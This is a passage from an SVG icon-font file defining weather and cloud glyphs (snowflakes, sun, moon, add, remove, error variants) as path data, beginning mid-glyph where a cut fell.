18.18v-36.361c0-8.796 7.422-15.926 16-15.926 8.837 0 16 6.875 16 15.926v36.361l31.489-18.18c7.617-4.398 17.504-1.536 21.793 5.893 4.418 7.653 2.046 17.294-5.793 21.82l-31.489 18.18 31.489 18.18c7.617 4.398 10.082 14.391 5.793 21.82-4.418 7.653-13.954 10.419-21.793 5.893l-31.489-18.18z" />
<glyph unicode="&#xeaf3;" glyph-name="cloud-snowflakes2" d="M863.979 498.735c56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-544.036c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831v0c-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 73.534 0 138.793-35.433 179.633-90.157 26.849 16.586 58.49 26.157 92.367 26.157 96.289 0 174.518-77.324 175.979-173.265v0zM352 107.713v36.361c0 8.796-7.422 15.926-16 15.926-8.837 0-16-6.875-16-15.926v-36.361l-31.489 18.18c-7.617 4.398-17.504 1.536-21.793-5.893-4.418-7.653-2.046-17.294 5.793-21.82l31.489-18.18-31.489-18.18c-7.617-4.398-10.082-14.391-5.793-21.82 4.418-7.653 13.954-10.419 21.793-5.893l31.489 18.18v-36.361c0-8.796 7.422-15.926 16-15.926 8.837 0 16 6.875 16 15.926v36.361l31.489-18.18c7.617-4.398 17.504-1.536 21.793 5.893 4.418 7.653 2.046 17.294-5.793 21.82l-31.489 18.18 31.489 18.18c7.617 4.398 10.082 14.391 5.793 21.82-4.418 7.653-13.954 10.419-21.793 5.893l-31.489-18.18zM736 107.713v36.361c0 8.796-7.422 15.926-16 15.926-8.837 0-16-6.875-16-15.926v-36.361l-31.489 18.18c-7.617 4.398-17.504 1.536-21.793-5.893-4.418-7.653-2.046-17.294 5.793-21.82l31.489-18.18-31.489-18.18c-7.617-4.398-10.082-14.391-5.793-21.82 4.418-7.653 13.954-10.419 21.793-5.893l31.489 18.18v-36.361c0-8.796 7.422-15.926 16-15.926 8.837 0 16 6.875 16 15.926v36.361l31.489-18.18c7.617-4.398 17.504-1.536 21.793 5.893 4.418 7.653 2.046 17.294-5.793 21.82l-31.489 18.18 31.489 18.18c7.617 4.398 10.082 14.391 5.793 21.82-4.418 7.653-13.954 10.419-21.793 5.893l-31.489-18.18zM544 75.713v36.361c0 8.796-7.422 15.926-16 15.926-8.837 0-16-6.875-16-15.926v-36.361l-31.489 18.18c-7.617 4.398-17.504 1.536-21.793-5.893-4.418-7.653-2.046-17.294 5.793-21.82l31.489-18.18-31.489-18.18c-7.617-4.398-10.082-14.391-5.793-21.82 4.418-7.653 13.954-10.419 21.793-5.893l31.489 18.18v-36.361c0-8.796 7.422-15.926 16-15.926 8.837 0 16 6.875 16 15.926v36.361l31.489-18.18c7.617-4.398 17.504-1.536 21.793 5.893 4.418 7.653 2.046 17.294-5.793 21.82l-31.489 18.18 31.489 18.18c7.617 4.398 10.082 14.391 5.793 21.82-4.418 7.653-13.954 10.419-21.793 5.893l-31.489-18.18z" />
<glyph unicode="&#xeaf4;" glyph-name="cloud-sun-snowflakes" d="M227.232 476.731v0c-2.123 11.433-3.232 23.221-3.232 35.269 0 106.039 85.961 192 192 192 74.764 0 139.548-42.733 171.258-105.107 25.969 25.429 61.525 41.107 100.742 41.107 79.529 0 144-64.471 144-144 0-6.692-0.457-13.278-1.34-19.727v0c55.786-13.784 97.34-64.195 97.34-124.273 0-70.549-57.348-128-128.090-128h-543.82c-70.556 0-128.090 57.308-128.090 128 0 60.652 42.388 111.624 99.232 124.731zM798.509 632.988c0.983 7.531 1.491 15.212 1.491 23.012 0 97.202-78.798 176-176 176-70.49 0-131.301-41.44-159.401-101.287v0c-15.648 3.461-31.91 5.287-48.599 5.287-123.712 0-224-100.288-224-224 0-4.421 0.128-8.812 0.381-13.169-56.712-24.642-96.381-81.203-96.381-146.831 0-88.366 71.44-160 159.982-160h544.036c88.356 0 159.982 71.814 159.982 160 0 65.653-39.435 122.071-96.021 146.735-0.826 54.236-26.185 102.522-65.47 134.253v0 0zM767.966 652.827v0 0c-23.994 12.259-51.172 19.173-79.966 19.173-33.877 0-65.518-9.571-92.367-26.157-25.253 33.838-59.843 60.3-99.953 75.57 23.827 46.648 72.344 78.586 128.319 78.586 79.529 0 144-64.471 144-144 0-1.060-0.011-2.118-0.034-3.173zM352 107.713v36.361c0 8.796-7.422 15.926-16 15.926-8.837 0-16-6.875-16-15.926v-36.361l-31.489 18.18c-7.617 4.398-17.504 1.536-21.793-5.893-4.418-7.653-2.046-17.294 5.793-21.82l31.489-18.18-31.489-18.18c-7.617-4.398-10.082-14.391-5.793-21.82 4.418-7.653 13.954-10.419 21.793-5.893l31.489 18.18v-36.361c0-8.796 7.422-15.926 16-15.926 8.837 0 16 6.875 16 15.926v36.361l31.489-18.18c7.617-4.398 17.504-1.536 21.793 5.893 4.418 7.653 2.046 17.294-5.793 21.82l-31.489 18.18 31.489 18.18c7.617 4.398 10.082 14.391 5.793 21.82-4.418 7.653-13.954 10.419-21.793 5.893l-31.489-18.18zM736 107.713v36.361c0 8.796-7.422 15.926-16 15.926-8.837 0-16-6.875-16-15.926v-36.361l-31.489 18.18c-7.617 4.398-17.504 1.536-21.793-5.893-4.418-7.653-2.046-17.294 5.793-21.82l31.489-18.18-31.489-18.18c-7.617-4.398-10.082-14.391-5.793-21.82 4.418-7.653 13.954-10.419 21.793-5.893l31.489 18.18v-36.361c0-8.796 7.422-15.926 16-15.926 8.837 0 16 6.875 16 15.926v36.361l31.489-18.18c7.617-4.398 17.504-1.536 21.793 5.893 4.418 7.653 2.046 17.294-5.793 21.82l-31.489 18.18 31.489 18.18c7.617 4.398 10.082 14.391 5.793 21.82-4.418 7.653-13.954 10.419-21.793 5.893l-31.489-18.18zM544 75.713v36.361c0 8.796-7.422 15.926-16 15.926-8.837 0-16-6.875-16-15.926v-36.361l-31.489 18.18c-7.617 4.398-17.504 1.536-21.793-5.893-4.418-7.653-2.046-17.294 5.793-21.82l31.489-18.18-31.489-18.18c-7.617-4.398-10.082-14.391-5.793-21.82 4.418-7.653 13.954-10.419 21.793-5.893l31.489 18.18v-36.361c0-8.796 7.422-15.926 16-15.926 8.837 0 16 6.875 16 15.926v36.361l31.489-18.18c7.617-4.398 17.504-1.536 21.793 5.893 4.418 7.653 2.046 17.294-5.793 21.82l-31.489 18.18 31.489 18.18c7.617 4.398 10.082 14.391 5.793 21.82-4.418 7.653-13.954 10.419-21.793 5.893l-31.489-18.18zM624 960c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM839.458 870.755c-6.248 6.248-16.196 6.432-22.523 0.104l-45.464-45.464c-6.191-6.191-5.961-16.457 0.104-22.523 6.248-6.248 16.196-6.432 22.523-0.104l45.464 45.464c6.191 6.191 5.961 16.457-0.104 22.523v0zM928.703 655.297c0 8.837-6.904 16-15.852 16h-64.295c-8.755 0-15.852-7.422-15.852-16 0-8.837 6.904-16 15.852-16h64.295c8.755 0 15.852 7.422 15.852 16v0zM408.542 870.755c-6.248-6.248-6.432-16.196-0.104-22.523l45.464-45.464c6.191-6.191 16.457-5.961 22.523 0.104 6.248 6.248 6.432 16.196 0.104 22.523l-45.464 45.464c-6.191 6.191-16.457 5.961-22.523-0.104v0z" />
<glyph unicode="&#xeaf5;" glyph-name="cloud-sun-snowflakes2" d="M798.509 632.988v0c39.285-31.731 64.644-80.018 65.47-134.253 56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-544.036c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 16.689 0 32.952-1.825 48.599-5.287v0c28.1 59.847 88.911 101.287 159.401 101.287 97.202 0 176-78.798 176-176 0-7.799-0.507-15.48-1.491-23.012zM767.966 652.827c0.023 1.055 0.034 2.113 0.034 3.173 0 79.529-64.471 144-144 144-55.976 0-104.492-31.939-128.319-78.586 40.109-15.27 74.699-41.732 99.953-75.57 26.849 16.586 58.49 26.157 92.367 26.157 28.793 0 55.972-6.914 79.966-19.173v0zM352 107.713v36.361c0 8.796-7.422 15.926-16 15.926-8.837 0-16-6.875-16-15.926v-36.361l-31.489 18.18c-7.617 4.398-17.504 1.536-21.793-5.893-4.418-7.653-2.046-17.294 5.793-21.82l31.489-18.18-31.489-18.18c-7.617-4.398-10.082-14.391-5.793-21.82 4.418-7.653 13.954-10.419 21.793-5.893l31.489 18.18v-36.361c0-8.796 7.422-15.926 16-15.926 8.837 0 16 6.875 16 15.926v36.361l31.489-18.18c7.617-4.398 17.504-1.536 21.793 5.893 4.418 7.653 2.046 17.294-5.793 21.82l-31.489 18.18 31.489 18.18c7.617 4.398 10.082 14.391 5.793 21.82-4.418 7.653-13.954 10.419-21.793 5.893l-31.489-18.18zM736 107.713v36.361c0 8.796-7.422 15.926-16 15.926-8.837 0-16-6.875-16-15.926v-36.361l-31.489 18.18c-7.617 4.398-17.504 1.536-21.793-5.893-4.418-7.653-2.046-17.294 5.793-21.82l31.489-18.18-31.489-18.18c-7.617-4.398-10.082-14.391-5.793-21.82 4.418-7.653 13.954-10.419 21.793-5.893l31.489 18.18v-36.361c0-8.796 7.422-15.926 16-15.926 8.837 0 16 6.875 16 15.926v36.361l31.489-18.18c7.617-4.398 17.504-1.536 21.793 5.893 4.418 7.653 2.046 17.294-5.793 21.82l-31.489 18.18 31.489 18.18c7.617 4.398 10.082 14.391 5.793 21.82-4.418 7.653-13.954 10.419-21.793 5.893l-31.489-18.18zM544 75.713v36.361c0 8.796-7.422 15.926-16 15.926-8.837 0-16-6.875-16-15.926v-36.361l-31.489 18.18c-7.617 4.398-17.504 1.536-21.793-5.893-4.418-7.653-2.046-17.294 5.793-21.82l31.489-18.18-31.489-18.18c-7.617-4.398-10.082-14.391-5.793-21.82 4.418-7.653 13.954-10.419 21.793-5.893l31.489 18.18v-36.361c0-8.796 7.422-15.926 16-15.926 8.837 0 16 6.875 16 15.926v36.361l31.489-18.18c7.617-4.398 17.504-1.536 21.793 5.893 4.418 7.653 2.046 17.294-5.793 21.82l-31.489 18.18 31.489 18.18c7.617 4.398 10.082 14.391 5.793 21.82-4.418 7.653-13.954 10.419-21.793 5.893l-31.489-18.18zM624 960c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM839.458 870.755c-6.248 6.248-16.196 6.432-22.523 0.104l-45.464-45.464c-6.191-6.191-5.961-16.457 0.104-22.523 6.248-6.248 16.196-6.432 22.523-0.104l45.464 45.464c6.191 6.191 5.961 16.457-0.104 22.523v0zM928.703 655.297c0 8.837-6.904 16-15.852 16h-64.295c-8.755 0-15.852-7.422-15.852-16 0-8.837 6.904-16 15.852-16h64.295c8.755 0 15.852 7.422 15.852 16v0zM408.542 870.755c-6.248-6.248-6.432-16.196-0.104-22.523l45.464-45.464c6.191-6.191 16.457-5.961 22.523 0.104 6.248 6.248 6.432 16.196 0.104 22.523l-45.464 45.464c-6.191 6.191-16.457 5.961-22.523-0.104v0z" />
<glyph unicode="&#xeaf6;" glyph-name="cloud-moon-snowflakes" d="M227.232 476.904v0c-2.123 11.433-3.232 23.221-3.232 35.269 0 106.039 85.961 192 192 192 74.764 0 139.548-42.733 171.258-105.107 25.969 25.429 61.525 41.107 100.742 41.107 79.529 0 144-64.471 144-144 0-6.692-0.457-13.278-1.34-19.727v0c55.786-13.784 97.34-64.195 97.34-124.273 0-70.549-57.348-128-128.090-128h-543.82c-70.556 0-128.090 57.308-128.090 128 0 60.652 42.388 111.624 99.232 124.731zM808.798 624.173c24.049 22.704 41.701 52.11 49.97 85.232 2.807 11.244 4.533 22.917 5.060 34.901-14.965-5.268-31.061-8.133-47.827-8.133-79.529 0-144 64.471-144 144 0 16.766 2.865 32.863 8.133 47.827-11.984-0.527-23.656-2.253-34.901-5.060-76.535-19.106-133.232-88.316-133.232-170.768 0-13.674 1.559-26.984 4.51-39.761-30.227 15.202-64.369 23.761-100.51 23.761-123.712 0-224-100.288-224-224 0-4.421 0.128-8.812 0.381-13.169-56.712-24.642-96.381-81.203-96.381-146.831 0-88.366 71.44-160 159.982-160h544.036c88.356 0 159.982 71.814 159.982 160 0 65.653-39.435 122.071-96.021 146.735-0.752 49.341-21.807 93.757-55.181 125.265v0 0zM783.265 644.186v0 0c-27.458 17.709-60.162 27.986-95.265 27.986-33.877 0-65.518-9.571-92.367-26.157-9.765 13.085-20.926 25.066-33.262 35.725-11.699 20.822-18.371 44.848-18.371 70.432 0 62.763 40.153 116.148 96.173 135.867-0.115-2.608-0.173-5.231-0.173-7.867 0-97.202 78.798-176 176-176 2.636 0 5.259 0.058 7.867 0.173-8.243-23.417-22.368-44.061-40.602-60.159zM352 107.713v36.361c0 8.796-7.422 15.926-16 15.926-8.837 0-16-6.875-16-15.926v-36.361l-31.489 18.18c-7.617 4.398-17.504 1.536-21.793-5.893-4.418-7.653-2.046-17.294 5.793-21.82l31.489-18.18-31.489-18.18c-7.617-4.398-10.082-14.391-5.793-21.82 4.418-7.653 13.954-10.419 21.793-5.893l31.489 18.18v-36.361c0-8.796 7.422-15.926 16-15.926 8.837 0 16 6.875 16 15.926v36.361l31.489-18.18c7.617-4.398 17.504-1.536 21.793 5.893 4.418 7.653 2.046 17.294-5.793 21.82l-31.489 18.18 31.489 18.18c7.617 4.398 10.082 14.391 5.793 21.82-4.418 7.653-13.954 10.419-21.793 5.893l-31.489-18.18zM736 107.713v36.361c0 8.796-7.422 15.926-16 15.926-8.837 0-16-6.875-16-15.926v-36.361l-31.489 18.18c-7.617 4.398-17.504 1.536-21.793-5.893-4.418-7.653-2.046-17.294 5.793-21.82l31.489-18.18-31.489-18.18c-7.617-4.398-10.082-14.391-5.793-21.82 4.418-7.653 13.954-10.419 21.793-5.893l31.489 18.18v-36.361c0-8.796 7.422-15.926 16-15.926 8.837 0 16 6.875 16 15.926v36.361l31.489-18.18c7.617-4.398 17.504-1.536 21.793 5.893 4.418 7.653 2.046 17.294-5.793 21.82l-31.489 18.18 31.489 18.18c7.617 4.398 10.082 14.391 5.793 21.82-4.418 7.653-13.954 10.419-21.793 5.893l-31.489-18.18zM544 75.713v36.361c0 8.796-7.422 15.926-16 15.926-8.837 0-16-6.875-16-15.926v-36.361l-31.489 18.18c-7.617 4.398-17.504 1.536-21.793-5.893-4.418-7.653-2.046-17.294 5.793-21.82l31.489-18.18-31.489-18.18c-7.617-4.398-10.082-14.391-5.793-21.82 4.418-7.653 13.954-10.419 21.793-5.893l31.489 18.18v-36.361c0-8.796 7.422-15.926 16-15.926 8.837 0 16 6.875 16 15.926v36.361l31.489-18.18c7.617-4.398 17.504-1.536 21.793 5.893 4.418 7.653 2.046 17.294-5.793 21.82l-31.489 18.18 31.489 18.18c7.617 4.398 10.082 14.391 5.793 21.82-4.418 7.653-13.954 10.419-21.793 5.893l-31.489-18.18z" />
<glyph unicode="&#xeaf7;" glyph-name="cloud-moon-snowflakes2" d="M808.798 624.173v0c33.374-31.508 54.429-75.924 55.181-125.265 56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-544.036c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 36.141 0 70.283-8.559 100.51-23.761-2.951 12.777-4.51 26.087-4.51 39.761 0 82.452 56.698 151.662 133.232 170.768 11.244 2.807 22.917 4.533 34.901 5.060-5.268-14.965-8.133-31.061-8.133-47.827 0-79.529 64.471-144 144-144 16.766 0 32.863 2.865 47.827 8.133-0.527-11.984-2.253-23.656-5.060-34.901-8.268-33.122-25.921-62.529-49.97-85.232zM783.265 644.186c18.234 16.098 32.359 36.742 40.602 60.159-2.608-0.115-5.231-0.173-7.867-0.173-97.202 0-176 78.798-176 176 0 2.636 0.058 5.259 0.173 7.867-56.019-19.719-96.173-73.104-96.173-135.867 0-25.584 6.672-49.61 18.371-70.432 12.336-10.658 23.497-22.64 33.262-35.725 26.849 16.586 58.49 26.157 92.367 26.157 35.104 0 67.807-10.277 95.265-27.986v0zM352 107.713v36.361c0 8.796-7.422 15.926-16 15.926-8.837 0-16-6.875-16-15.926v-36.361l-31.489 18.18c-7.617 4.398-17.504 1.536-21.793-5.893-4.418-7.653-2.046-17.294 5.793-21.82l31.489-18.18-31.489-18.18c-7.617-4.398-10.082-14.391-5.793-21.82 4.418-7.653 13.954-10.419 21.793-5.893l31.489 18.18v-36.361c0-8.796 7.422-15.926 16-15.926 8.837 0 16 6.875 16 15.926v36.361l31.489-18.18c7.617-4.398 17.504-1.536 21.793 5.893 4.418 7.653 2.046 17.294-5.793 21.82l-31.489 18.18 31.489 18.18c7.617 4.398 10.082 14.391 5.793 21.82-4.418 7.653-13.954 10.419-21.793 5.893l-31.489-18.18zM736 107.713v36.361c0 8.796-7.422 15.926-16 15.926-8.837 0-16-6.875-16-15.926v-36.361l-31.489 18.18c-7.617 4.398-17.504 1.536-21.793-5.893-4.418-7.653-2.046-17.294 5.793-21.82l31.489-18.18-31.489-18.18c-7.617-4.398-10.082-14.391-5.793-21.82 4.418-7.653 13.954-10.419 21.793-5.893l31.489 18.18v-36.361c0-8.796 7.422-15.926 16-15.926 8.837 0 16 6.875 16 15.926v36.361l31.489-18.18c7.617-4.398 17.504-1.536 21.793 5.893 4.418 7.653 2.046 17.294-5.793 21.82l-31.489 18.18 31.489 18.18c7.617 4.398 10.082 14.391 5.793 21.82-4.418 7.653-13.954 10.419-21.793 5.893l-31.489-18.18zM544 75.713v36.361c0 8.796-7.422 15.926-16 15.926-8.837 0-16-6.875-16-15.926v-36.361l-31.489 18.18c-7.617 4.398-17.504 1.536-21.793-5.893-4.418-7.653-2.046-17.294 5.793-21.82l31.489-18.18-31.489-18.18c-7.617-4.398-10.082-14.391-5.793-21.82 4.418-7.653 13.954-10.419 21.793-5.893l31.489 18.18v-36.361c0-8.796 7.422-15.926 16-15.926 8.837 0 16 6.875 16 15.926v36.361l31.489-18.18c7.617-4.398 17.504-1.536 21.793 5.893 4.418 7.653 2.046 17.294-5.793 21.82l-31.489 18.18 31.489 18.18c7.617 4.398 10.082 14.391 5.793 21.82-4.418 7.653-13.954 10.419-21.793 5.893l-31.489-18.18z" />
<glyph unicode="&#xeaf8;" glyph-name="clouds" d="M264.562 192h-24.356c-26.623 0-48.206-21.306-48.206-48 0-26.51 21.489-48 48.206-48h255.588c26.623 0 48.206 21.306 48.206 48 0 26.51-21.489 48-48.206 48h-15.794c0 35.346-28.654 64-64 64-13.173 0-25.417-3.98-35.594-10.803-8.747 24.929-32.489 42.803-60.406 42.803-35.346 0-64-28.654-64-64 0-11.657 3.117-22.586 8.562-32v0zM506.797 223.255c21.726-2.965 40.65-14.585 53.191-31.255h239.921c70.742 0 128.090 57.451 128.090 128 0 60.078-41.554 110.489-97.34 124.273v0c0.884 6.449 1.34 13.035 1.34 19.727 0 79.529-64.471 144-144 144-39.217 0-74.773-15.677-100.742-41.107-31.71 62.374-96.494 105.107-171.258 105.107-106.039 0-192-85.961-192-192 0-12.048 1.11-23.836 3.232-35.269v0c-56.845-13.107-99.232-64.079-99.232-124.731 0-47.691 26.185-89.29 64.887-111.311v0c9.107 6.62 19.671 11.367 31.126 13.692-0.009 0.539-0.013 1.078-0.013 1.619 0 53.019 42.981 96 96 96 29.659 0 56.177-13.45 73.786-34.583 7.13 1.689 14.567 2.583 22.214 2.583 42.077 0 77.831-27.070 90.797-64.745v0 0zM170.899 184.427c-45.038 28.306-74.899 78.443-74.899 135.573 0 65.628 39.669 122.189 96.381 146.831-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 41.228 0 79.855-11.138 113.036-30.57 11.507 14.626 28.024 25.103 46.978 28.951v0c-0.009 0.539-0.013 1.078-0.013 1.619 0 53.019 42.981 96 96 96 29.659 0 56.177-13.45 73.786-34.583 7.13 1.689 14.567 2.583 22.214 2.583 42.077 0 77.831-27.070 90.797-64.745v0c39.151-5.343 69.203-38.791 69.203-79.255 0-44.491-35.911-80-80.209-80h-2.982c11.881-23.241 18.746-49.472 19.17-77.265 56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-225.619c1.050-5.17 1.601-10.521 1.601-16 0-44.491-35.911-80-80.209-80h-255.582c-44.381 0-80.209 35.817-80.209 80 0 14.794 3.97 28.594 10.899 40.427v0 0zM823.771 576h24.023c26.623 0 48.206 21.306 48.206 48 0 26.51-21.489 48-48.206 48h-15.794c0 35.346-28.654 64-64 64-13.173 0-25.417-3.98-35.594-10.803-8.747 24.929-32.489 42.803-60.406 42.803-35.346 0-64-28.654-64-64 0-11.657 3.117-22.586 8.562-32v0h-24.356c-14.679 0-27.825-6.476-36.666-16.761v0c15.071-12.016 28.556-25.936 40.094-41.395 26.849 16.586 58.49 26.157 92.367 26.157 54.654 0 103.489-24.912 135.771-64v0 0z" />
<glyph unicode="&#xeaf9;" glyph-name="clouds2" d="M506.797 223.255c39.151-5.343 69.203-38.791 69.203-79.255 0-44.491-35.911-80-80.209-80h-255.582c-44.381 0-80.209 35.817-80.209 80 0 38.919 27.479 70.964 64.013 78.381v0c-0.009 0.539-0.013 1.078-0.013 1.619 0 53.019 42.981 96 96 96 29.659 0 56.177-13.45 73.786-34.583 7.13 1.689 14.567 2.583 22.214 2.583 42.077 0 77.831-27.070 90.797-64.745v0zM529.721 250.808c40.305-12.779 70.961-47.865 77.139-90.808v0h193.159c88.356 0 159.982 71.814 159.982 160 0 65.653-39.435 122.071-96.021 146.735v0c-1.462 95.941-79.69 173.265-175.979 173.265-33.877 0-65.518-9.571-92.367-26.157-40.84 54.724-106.099 90.157-179.633 90.157-123.712 0-224-100.288-224-224 0-4.421 0.128-8.812 0.381-13.169v0c-56.712-24.642-96.381-81.203-96.381-146.831 0-45.569 18.999-86.689 49.544-115.83 11.657 18.256 28.458 32.922 48.357 41.932v0c10.471 60.16 62.944 105.898 126.099 105.898 32.707 0 62.548-12.267 85.175-32.451 3.569 0.299 7.179 0.451 10.825 0.451 49.491 0 92.421-28.088 113.721-69.192v0 0zM877.596 549.666c29.54 11.728 50.404 40.422 50.404 74.334 0 40.465-30.052 73.913-69.203 79.255v0c-12.966 37.675-48.72 64.745-90.797 64.745-7.646 0-15.084-0.894-22.214-2.583-17.61 21.133-44.127 34.583-73.786 34.583-53.019 0-96-42.981-96-96 0-0.541 0.004-1.080 0.013-1.619v0c-7.41-1.504-14.447-4.022-20.958-7.404 17.842-11.565 34.153-25.29 48.563-40.805 25.789 11.46 54.342 17.828 84.382 17.828 84.336 0 156.949-50.192 189.596-122.334v0 0z" />
<glyph unicode="&#xeafa;" glyph-name="cloud-add" d="M512 384v79.89c0 8.657 7.163 16.11 16 16.11 8.578 0 16-7.212 16-16.11v-79.89h79.89c8.657 0 16.11-7.163 16.11-16 0-8.578-7.212-16-16.11-16h-79.89v-79.89c0-8.657-7.163-16.11-16-16.11-8.578 0-16 7.212-16 16.11v79.89h-79.89c-8.657 0-16.11 7.163-16.11 16 0 8.578 7.212 16 16.11 16h79.89zM227.232 444.731c-56.845-13.107-99.232-64.079-99.232-124.731 0-70.692 57.534-128 128.090-128h543.82c70.742 0 128.090 57.451 128.090 128 0 60.078-41.554 110.489-97.34 124.273v0c0.884 6.449 1.34 13.035 1.34 19.727 0 79.529-64.471 144-144 144-39.217 0-74.773-15.677-100.742-41.107-31.71 62.374-96.494 105.107-171.258 105.107-106.039 0-192-85.961-192-192 0-12.048 1.11-23.836 3.232-35.269v0 0zM863.979 466.735c56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-544.036c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831v0c-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 73.534 0 138.793-35.433 179.633-90.157 26.849 16.586 58.49 26.157 92.367 26.157 96.289 0 174.518-77.324 175.979-173.265v0 0z" />
<glyph unicode="&#xeafb;" glyph-name="cloud-add2" d="M512 384h-79.89c-8.897 0-16.11-7.422-16.11-16 0-8.837 7.453-16 16.11-16h79.89v-79.89c0-8.897 7.422-16.11 16-16.11 8.837 0 16 7.453 16 16.11v79.89h79.89c8.897 0 16.11 7.422 16.11 16 0 8.837-7.453 16-16.11 16h-79.89v79.89c0 8.897-7.422 16.11-16 16.11-8.837 0-16-7.453-16-16.11v-79.89zM863.979 466.735c56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-544.036c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831v0c-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 73.534 0 138.793-35.433 179.633-90.157 26.849 16.586 58.49 26.157 92.367 26.157 96.289 0 174.518-77.324 175.979-173.265v0 0z" />
<glyph unicode="&#xeafc;" glyph-name="cloud-remove" d="M227.232 444.731c-56.845-13.107-99.232-64.079-99.232-124.731 0-70.692 57.534-128 128.090-128h543.82c70.742 0 128.090 57.451 128.090 128 0 60.078-41.554 110.489-97.34 124.273v0c0.884 6.449 1.34 13.035 1.34 19.727 0 79.529-64.471 144-144 144-39.217 0-74.773-15.677-100.742-41.107-31.71 62.374-96.494 105.107-171.258 105.107-106.039 0-192-85.961-192-192 0-12.048 1.11-23.836 3.232-35.269v0 0zM863.979 466.735c56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-544.036c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831v0c-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 73.534 0 138.793-35.433 179.633-90.157 26.849 16.586 58.49 26.157 92.367 26.157 96.289 0 174.518-77.324 175.979-173.265v0 0zM432.11 384c-8.897 0-16.11-7.422-16.11-16 0-8.837 7.453-16 16.11-16h191.781c8.897 0 16.11 7.422 16.11 16 0 8.837-7.453 16-16.11 16h-191.781z" />
<glyph unicode="&#xeafd;" glyph-name="cloud-remove2" d="M863.979 466.735c56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-544.036c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831v0c-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 73.534 0 138.793-35.433 179.633-90.157 26.849 16.586 58.49 26.157 92.367 26.157 96.289 0 174.518-77.324 175.979-173.265v0 0zM432.11 384c-8.897 0-16.11-7.422-16.11-16 0-8.837 7.453-16 16.11-16h191.781c8.897 0 16.11 7.422 16.11 16 0 8.837-7.453 16-16.11 16h-191.781z" />
<glyph unicode="&#xeafe;" glyph-name="cloud-error3" d="M227.232 444.731c-56.845-13.107-99.232-64.079-99.232-124.731 0-70.692 57.534-128 128.090-128h543.82c70.742 0 128.090 57.451 128.090 128 0 60.078-41.554 110.489-97.34 124.273v0c0.884 6.449 1.34 13.035 1.34 19.727 0 79.529-64.471 144-144 144-39.217 0-74.773-15.677-100.742-41.107-31.71 62.374-96.494 105.107-171.258 105.107-106.039 0-192-85.961-192-192 0-12.048 1.11-23.836 3.232-35.269v0 0zM863.979 466.735c56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-544.036c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831v0c-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 73.534 0 138.793-35.433 179.633-90.157 26.849 16.586 58.49 26.157 92.367 26.157 96.289 0 174.518-77.324 175.979-173.265v0 0zM528 512c-8.837 0-16-7.292-16-15.712v-160.576c0-8.678 7.422-15.712 16-15.712 8.837 0 16 7.292 16 15.712v160.576c0 8.678-7.422 15.712-16 15.712v0zM528 256c-8.837 0-16 7.422-16 16 0 8.837 7.422 16 16 16 8.837 0 16-7.422 16-16 0-8.837-7.422-16-16-16v0z" />
<glyph unicode="&#xeaff;" glyph-name="cloud-error4" d="M528 256v0c8.578 0 16 7.163 16 16 0 8.578-7.163 16-16 16-8.578 0-16-7.163-16-16 0-8.578 7.163-16 16-16zM863.979 466.735c56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-544.036c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831v0c-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 73.534 0 138.793-35.433 179.633-90.157 26.849 16.586 58.49 26.157 92.367 26.157 96.289 0 174.518-77.324 175.979-173.265v0 0zM528 512c-8.837 0-16-7.292-16-15.712v-160.576c0-8.678 7.422-15.712 16-15.712 8.837 0 16 7.292 16 15.712v160.576c0 8.678-7.422 15.712-16 15.712v0z" />
